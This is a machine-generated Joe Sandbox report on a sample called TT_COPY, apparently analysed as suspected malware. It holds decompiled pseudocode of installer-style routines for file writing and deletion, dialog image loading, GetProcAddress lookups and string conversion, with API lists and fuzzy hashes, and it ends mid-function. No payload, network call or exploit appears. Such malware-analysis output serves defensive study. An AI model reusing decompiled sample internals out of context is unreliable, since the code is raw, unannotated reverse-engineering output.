                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1093774692.0000000070B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 70B50000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1093699351.0000000070B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093840225.0000000070B54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093914971.0000000070B56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_70b50000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$Free$Alloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1780285237-0
                                                                                                                            • Opcode ID: 53b206f71ad90bebbabb731aed350293142db15fa5e42ea2b4c449f1d493f817
                                                                                                                            • Instruction ID: 6ed791e4e4fcc66ac51c90880f402b954fa426cc8cff1bca5ae2911a5a602c34
                                                                                                                            • Opcode Fuzzy Hash: 53b206f71ad90bebbabb731aed350293142db15fa5e42ea2b4c449f1d493f817
                                                                                                                            • Instruction Fuzzy Hash: 4431AD72606101EFD7268F55CDD4D2E77FAEB8A315B3845A8F201C32A0DB716F099B61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E00402950(int __ebx) {
                                                                                                                            				WCHAR* _t26;
                                                                                                                            				void* _t29;
                                                                                                                            				long _t37;
                                                                                                                            				int _t49;
                                                                                                                            				void* _t52;
                                                                                                                            				void* _t54;
                                                                                                                            				void* _t56;
                                                                                                                            				void* _t59;
                                                                                                                            				void* _t60;
                                                                                                                            				void* _t61;
                                                                                                                            
                                                                                                                            				_t49 = __ebx;
                                                                                                                            				_t52 = 0xfffffd66;
                                                                                                                            				_t26 = E00402DA6(0xfffffff0);
                                                                                                                            				_t55 = _t26;
                                                                                                                            				 *(_t61 - 0x40) = _t26;
                                                                                                                            				if(E00405E83(_t26) == 0) {
                                                                                                                            					E00402DA6(0xffffffed);
                                                                                                                            				}
                                                                                                                            				E00406008(_t55);
                                                                                                                            				_t29 = E0040602D(_t55, 0x40000000, 2);
                                                                                                                            				 *(_t61 + 8) = _t29;
                                                                                                                            				if(_t29 != 0xffffffff) {
                                                                                                                            					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                                                                            					if( *(_t61 - 0x28) != _t49) {
                                                                                                                            						_t37 =  *0x434f14;
                                                                                                                            						 *(_t61 - 0x44) = _t37;
                                                                                                                            						_t54 = GlobalAlloc(0x40, _t37);
                                                                                                                            						if(_t54 != _t49) {
                                                                                                                            							E004034E5(_t49);
                                                                                                                            							E004034CF(_t54,  *(_t61 - 0x44));
                                                                                                                            							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                                                                            							 *(_t61 - 0x10) = _t59;
                                                                                                                            							if(_t59 != _t49) {
                                                                                                                            								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                                                                            								while( *_t59 != _t49) {
                                                                                                                            									_t60 = _t59 + 8;
                                                                                                                            									 *(_t61 - 0x3c) =  *_t59;
                                                                                                                            									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                                                                            									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                                                                            								}
                                                                                                                            								GlobalFree( *(_t61 - 0x10));
                                                                                                                            							}
                                                                                                                            							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                                                                            							GlobalFree(_t54);
                                                                                                                            							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                                                                            					CloseHandle( *(_t61 + 8));
                                                                                                                            				}
                                                                                                                            				_t56 = 0xfffffff3;
                                                                                                                            				if(_t52 < _t49) {
                                                                                                                            					_t56 = 0xffffffef;
                                                                                                                            					DeleteFileW( *(_t61 - 0x40));
                                                                                                                            					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                                                                            				}
                                                                                                                            				_push(_t56);
                                                                                                                            				E00401423();
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}













                                                                                                                            0x00402950
                                                                                                                            0x00402952
                                                                                                                            0x00402957
                                                                                                                            0x0040295c
                                                                                                                            0x0040295f
                                                                                                                            0x00402969
                                                                                                                            0x0040296d
                                                                                                                            0x0040296d
                                                                                                                            0x00402973
                                                                                                                            0x00402980
                                                                                                                            0x00402988
                                                                                                                            0x0040298b
                                                                                                                            0x00402997
                                                                                                                            0x0040299a
                                                                                                                            0x004029a0
                                                                                                                            0x004029ae
                                                                                                                            0x004029b3
                                                                                                                            0x004029b7
                                                                                                                            0x004029ba
                                                                                                                            0x004029c3
                                                                                                                            0x004029cf
                                                                                                                            0x004029d3
                                                                                                                            0x004029d6
                                                                                                                            0x004029e0
                                                                                                                            0x004029ff
                                                                                                                            0x004029ec
                                                                                                                            0x004029f4
                                                                                                                            0x004029f7
                                                                                                                            0x004029fc
                                                                                                                            0x004029fc
                                                                                                                            0x00402a06
                                                                                                                            0x00402a06
                                                                                                                            0x00402a13
                                                                                                                            0x00402a19
                                                                                                                            0x00402a1f
                                                                                                                            0x00402a1f
                                                                                                                            0x004029b7
                                                                                                                            0x00402a33
                                                                                                                            0x00402a35
                                                                                                                            0x00402a35
                                                                                                                            0x00402a3f
                                                                                                                            0x00402a40
                                                                                                                            0x00402a44
                                                                                                                            0x00402a48
                                                                                                                            0x00402a4e
                                                                                                                            0x00402a4e
                                                                                                                            0x00402a55
                                                                                                                            0x004022f1
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2667972263-0
                                                                                                                            • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                            • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                                                            • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                            • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 85%
                                                                                                                            			E70B52480(void* __edx) {
                                                                                                                            				void* _t37;
                                                                                                                            				signed int _t38;
                                                                                                                            				void* _t39;
                                                                                                                            				void* _t41;
                                                                                                                            				signed char* _t42;
                                                                                                                            				signed char* _t51;
                                                                                                                            				void* _t52;
                                                                                                                            				void* _t54;
                                                                                                                            
                                                                                                                            				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                                                                            				while(1) {
                                                                                                                            					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                                                                            					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                                                                            					_t52 = _t51[0x18];
                                                                                                                            					if(_t52 == 0) {
                                                                                                                            						goto L9;
                                                                                                                            					}
                                                                                                                            					_t41 = 0x1a;
                                                                                                                            					if(_t52 == _t41) {
                                                                                                                            						goto L9;
                                                                                                                            					}
                                                                                                                            					if(_t52 != 0xffffffff) {
                                                                                                                            						if(_t52 <= 0 || _t52 > 0x19) {
                                                                                                                            							_t51[0x18] = _t41;
                                                                                                                            							goto L12;
                                                                                                                            						} else {
                                                                                                                            							_t37 = E70B5135A(_t52 - 1);
                                                                                                                            							L10:
                                                                                                                            							goto L11;
                                                                                                                            						}
                                                                                                                            					} else {
                                                                                                                            						_t37 = E70B512E3();
                                                                                                                            						L11:
                                                                                                                            						_t52 = _t37;
                                                                                                                            						L12:
                                                                                                                            						_t13 =  &(_t51[8]); // 0x1020
                                                                                                                            						_t42 = _t13;
                                                                                                                            						if(_t51[4] >= 0) {
                                                                                                                            						}
                                                                                                                            						_t38 =  *_t51 & 0x000000ff;
                                                                                                                            						_t51[0x1c] = 0;
                                                                                                                            						if(_t38 > 7) {
                                                                                                                            							L27:
                                                                                                                            							_t39 = GlobalFree(_t52);
                                                                                                                            							if( *(_t54 + 0x10) == 0) {
                                                                                                                            								return _t39;
                                                                                                                            							}
                                                                                                                            							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                                                                            								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                                                                            							} else {
                                                                                                                            								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                                                                            							}
                                                                                                                            							continue;
                                                                                                                            						} else {
                                                                                                                            							switch( *((intOrPtr*)(_t38 * 4 +  &M70B525F8))) {
                                                                                                                            								case 0:
                                                                                                                            									 *_t42 = 0;
                                                                                                                            									goto L27;
                                                                                                                            								case 1:
                                                                                                                            									__eax = E70B513B1(__ebp);
                                                                                                                            									goto L21;
                                                                                                                            								case 2:
                                                                                                                            									 *__edi = E70B513B1(__ebp);
                                                                                                                            									__edi[1] = __edx;
                                                                                                                            									goto L27;
                                                                                                                            								case 3:
                                                                                                                            									__eax = GlobalAlloc(0x40,  *0x70b5506c);
                                                                                                                            									 *(__esi + 0x1c) = __eax;
                                                                                                                            									__edx = 0;
                                                                                                                            									 *__edi = __eax;
                                                                                                                            									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x70b5506c, __eax,  *0x70b5506c, 0, 0);
                                                                                                                            									goto L27;
                                                                                                                            								case 4:
                                                                                                                            									__eax = E70B512CC(__ebp);
                                                                                                                            									 *(__esi + 0x1c) = __eax;
                                                                                                                            									L21:
                                                                                                                            									 *__edi = __eax;
                                                                                                                            									goto L27;
                                                                                                                            								case 5:
                                                                                                                            									__eax = GlobalAlloc(0x40, 0x10);
                                                                                                                            									_push(__eax);
                                                                                                                            									 *(__esi + 0x1c) = __eax;
                                                                                                                            									_push(__ebp);
                                                                                                                            									 *__edi = __eax;
                                                                                                                            									__imp__CLSIDFromString();
                                                                                                                            									goto L27;
                                                                                                                            								case 6:
                                                                                                                            									if( *__ebp != __cx) {
                                                                                                                            										__eax = E70B513B1(__ebp);
                                                                                                                            										 *__ebx = __eax;
                                                                                                                            									}
                                                                                                                            									goto L27;
                                                                                                                            								case 7:
                                                                                                                            									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                                                                            									( *(__esi + 0x18) - 1) *  *0x70b5506c =  *0x70b55074 + ( *(__esi + 0x18) - 1) *  *0x70b5506c * 2 + 0x18;
                                                                                                                            									 *__ebx =  *0x70b55074 + ( *(__esi + 0x18) - 1) *  *0x70b5506c * 2 + 0x18;
                                                                                                                            									asm("cdq");
                                                                                                                            									__eax = E70B51510(__edx,  *0x70b55074 + ( *(__esi + 0x18) - 1) *  *0x70b5506c * 2 + 0x18, __edx,  *0x70b55074 + ( *(__esi + 0x18) - 1) *  *0x70b5506c * 2);
                                                                                                                            									goto L27;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L9:
                                                                                                                            					_t37 = E70B512CC(0x70b55044);
                                                                                                                            					goto L10;
                                                                                                                            				}
                                                                                                                            			}











                                                                                                                            0x70b52494
                                                                                                                            0x70b52498
                                                                                                                            0x70b524a3
                                                                                                                            0x70b524a3
                                                                                                                            0x70b524aa
                                                                                                                            0x70b524af
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b524b3
                                                                                                                            0x70b524b6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b524bb
                                                                                                                            0x70b524c6
                                                                                                                            0x70b524d6
                                                                                                                            0x00000000
                                                                                                                            0x70b524cd
                                                                                                                            0x70b524cf
                                                                                                                            0x70b524e5
                                                                                                                            0x00000000
                                                                                                                            0x70b524e5
                                                                                                                            0x70b524bd
                                                                                                                            0x70b524bd
                                                                                                                            0x70b524e6
                                                                                                                            0x70b524e6
                                                                                                                            0x70b524e8
                                                                                                                            0x70b524ec
                                                                                                                            0x70b524ec
                                                                                                                            0x70b524ef
                                                                                                                            0x70b524ef
                                                                                                                            0x70b524f7
                                                                                                                            0x70b524ff
                                                                                                                            0x70b52502
                                                                                                                            0x70b525c1
                                                                                                                            0x70b525c2
                                                                                                                            0x70b525cd
                                                                                                                            0x70b525f7
                                                                                                                            0x70b525f7
                                                                                                                            0x70b525dd
                                                                                                                            0x70b525e9
                                                                                                                            0x70b525df
                                                                                                                            0x70b525df
                                                                                                                            0x70b525df
                                                                                                                            0x00000000
                                                                                                                            0x70b52508
                                                                                                                            0x70b52508
                                                                                                                            0x00000000
                                                                                                                            0x70b5250f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52517
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52525
                                                                                                                            0x70b52527
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52548
                                                                                                                            0x70b5254e
                                                                                                                            0x70b52551
                                                                                                                            0x70b52553
                                                                                                                            0x70b52563
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52530
                                                                                                                            0x70b52535
                                                                                                                            0x70b52538
                                                                                                                            0x70b52539
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5256f
                                                                                                                            0x70b52575
                                                                                                                            0x70b52576
                                                                                                                            0x70b52579
                                                                                                                            0x70b5257a
                                                                                                                            0x70b5257c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52588
                                                                                                                            0x70b5258b
                                                                                                                            0x70b52597
                                                                                                                            0x70b52599
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b525a5
                                                                                                                            0x70b525b1
                                                                                                                            0x70b525b4
                                                                                                                            0x70b525b6
                                                                                                                            0x70b525b9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52508
                                                                                                                            0x70b52502
                                                                                                                            0x70b524db
                                                                                                                            0x70b524e0
                                                                                                                            0x00000000
                                                                                                                            0x70b524e0

                                                                                                                            APIs
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70B525C2
                                                                                                                              • Part of subcall function 70B512CC: lstrcpynW.KERNEL32(00000000,?,70B5137F,00000019,70B511CA,-000000A0), ref: 70B512DC
                                                                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 70B52548
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70B52563
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1093774692.0000000070B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 70B50000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1093699351.0000000070B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093840225.0000000070B54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093914971.0000000070B56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_70b50000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4216380887-0
                                                                                                                            • Opcode ID: a2b9877b3782988773f462c15022eaee2029667b84b4a3b76d63e34da2dcb9be
                                                                                                                            • Instruction ID: 3f43d64e5d40150687cd47741cd44f81b94914259a8405ad907d18b07483f310
                                                                                                                            • Opcode Fuzzy Hash: a2b9877b3782988773f462c15022eaee2029667b84b4a3b76d63e34da2dcb9be
                                                                                                                            • Instruction Fuzzy Hash: 6C41A1B1005205EFE7259F25E890A2E77F8FB95311F20499DFA46C7290FB70A748DB61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E00401D81(void* __ebx, void* __edx) {
                                                                                                                            				struct HWND__* _t30;
                                                                                                                            				WCHAR* _t38;
                                                                                                                            				void* _t48;
                                                                                                                            				void* _t53;
                                                                                                                            				signed int _t55;
                                                                                                                            				signed int _t60;
                                                                                                                            				long _t63;
                                                                                                                            				void* _t65;
                                                                                                                            
                                                                                                                            				_t53 = __ebx;
                                                                                                                            				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                                                                            					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                                                                            				} else {
                                                                                                                            					E00402D84(2);
                                                                                                                            					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                                                                            				}
                                                                                                                            				_t55 =  *(_t65 - 0x24);
                                                                                                                            				 *(_t65 + 8) = _t30;
                                                                                                                            				_t60 = _t55 & 0x00000004;
                                                                                                                            				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                                                                            				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                                                                            				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                                                                            				if((_t55 & 0x00010000) == 0) {
                                                                                                                            					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                                                                            				} else {
                                                                                                                            					_t38 = E00402DA6(0x11);
                                                                                                                            				}
                                                                                                                            				 *(_t65 - 0x44) = _t38;
                                                                                                                            				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                                                                            				asm("sbb esi, esi");
                                                                                                                            				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                                                                            				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                                                                            				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                                                                            					DeleteObject(_t48);
                                                                                                                            				}
                                                                                                                            				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                                                                            					_push(_t63);
                                                                                                                            					E00406484();
                                                                                                                            				}
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}











                                                                                                                            0x00401d81
                                                                                                                            0x00401d85
                                                                                                                            0x00401d9a
                                                                                                                            0x00401d87
                                                                                                                            0x00401d89
                                                                                                                            0x00401d8f
                                                                                                                            0x00401d8f
                                                                                                                            0x00401da0
                                                                                                                            0x00401da3
                                                                                                                            0x00401dad
                                                                                                                            0x00401db0
                                                                                                                            0x00401db8
                                                                                                                            0x00401dc9
                                                                                                                            0x00401dcc
                                                                                                                            0x00401dd7
                                                                                                                            0x00401dce
                                                                                                                            0x00401dd0
                                                                                                                            0x00401dd0
                                                                                                                            0x00401ddb
                                                                                                                            0x00401de5
                                                                                                                            0x00401e0c
                                                                                                                            0x00401e1b
                                                                                                                            0x00401e29
                                                                                                                            0x00401e31
                                                                                                                            0x00401e39
                                                                                                                            0x00401e39
                                                                                                                            0x00401e42
                                                                                                                            0x00401e48
                                                                                                                            0x00402ba4
                                                                                                                            0x00402ba4
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                            • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1849352358-0
                                                                                                                            • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                            • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                                                                            • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                            • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E70B516BD(struct HINSTANCE__* _a4, short* _a8) {
                                                                                                                            				_Unknown_base(*)()* _t7;
                                                                                                                            				void* _t10;
                                                                                                                            				int _t14;
                                                                                                                            
                                                                                                                            				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                                                                            				_t10 = GlobalAlloc(0x40, _t14);
                                                                                                                            				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                                                                            				_t7 = GetProcAddress(_a4, _t10);
                                                                                                                            				GlobalFree(_t10);
                                                                                                                            				return _t7;
                                                                                                                            			}






                                                                                                                            0x70b516d7
                                                                                                                            0x70b516e3
                                                                                                                            0x70b516f0
                                                                                                                            0x70b516f7
                                                                                                                            0x70b51700
                                                                                                                            0x70b5170c

                                                                                                                            APIs
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,70B522D8,?,00000808), ref: 70B516D5
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,70B522D8,?,00000808), ref: 70B516DC
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,70B522D8,?,00000808), ref: 70B516F0
                                                                                                                            • GetProcAddress.KERNEL32(70B522D8,00000000), ref: 70B516F7
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70B51700
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1093774692.0000000070B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 70B50000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1093699351.0000000070B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093840225.0000000070B54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093914971.0000000070B56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_70b50000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1148316912-0
                                                                                                                            • Opcode ID: 3f233729bf20612febe38a17f3e00322c842b5b6fb7cf7e81d4899f4c1c1319f
                                                                                                                            • Instruction ID: 74d4c90ef7ec8eb2ea6b44374375a40cd593c5c0d64074c31dc5045749836af3
                                                                                                                            • Opcode Fuzzy Hash: 3f233729bf20612febe38a17f3e00322c842b5b6fb7cf7e81d4899f4c1c1319f
                                                                                                                            • Instruction Fuzzy Hash: 48F0987320A1387B963116A78C48D9BBE9CDF8B2F9B350255F728921E08AA15D0197F1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 59%
                                                                                                                            			E00401C43(intOrPtr __edx) {
                                                                                                                            				int _t29;
                                                                                                                            				long _t30;
                                                                                                                            				signed int _t32;
                                                                                                                            				WCHAR* _t35;
                                                                                                                            				long _t36;
                                                                                                                            				int _t41;
                                                                                                                            				signed int _t42;
                                                                                                                            				int _t46;
                                                                                                                            				int _t56;
                                                                                                                            				intOrPtr _t57;
                                                                                                                            				struct HWND__* _t63;
                                                                                                                            				void* _t64;
                                                                                                                            
                                                                                                                            				_t57 = __edx;
                                                                                                                            				_t29 = E00402D84(3);
                                                                                                                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                            				 *(_t64 - 0x18) = _t29;
                                                                                                                            				_t30 = E00402D84(4);
                                                                                                                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                            				 *(_t64 + 8) = _t30;
                                                                                                                            				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                                                                            					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                                                                            				}
                                                                                                                            				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                                                                            				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                                                                            					 *(_t64 + 8) = E00402DA6(0x44);
                                                                                                                            				}
                                                                                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                                                                            				_push(1);
                                                                                                                            				if(__eflags != 0) {
                                                                                                                            					_t61 = E00402DA6();
                                                                                                                            					_t32 = E00402DA6();
                                                                                                                            					asm("sbb ecx, ecx");
                                                                                                                            					asm("sbb eax, eax");
                                                                                                                            					_t35 =  ~( *_t31) & _t61;
                                                                                                                            					__eflags = _t35;
                                                                                                                            					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                                                            					goto L10;
                                                                                                                            				} else {
                                                                                                                            					_t63 = E00402D84();
                                                                                                                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                            					_t41 = E00402D84(2);
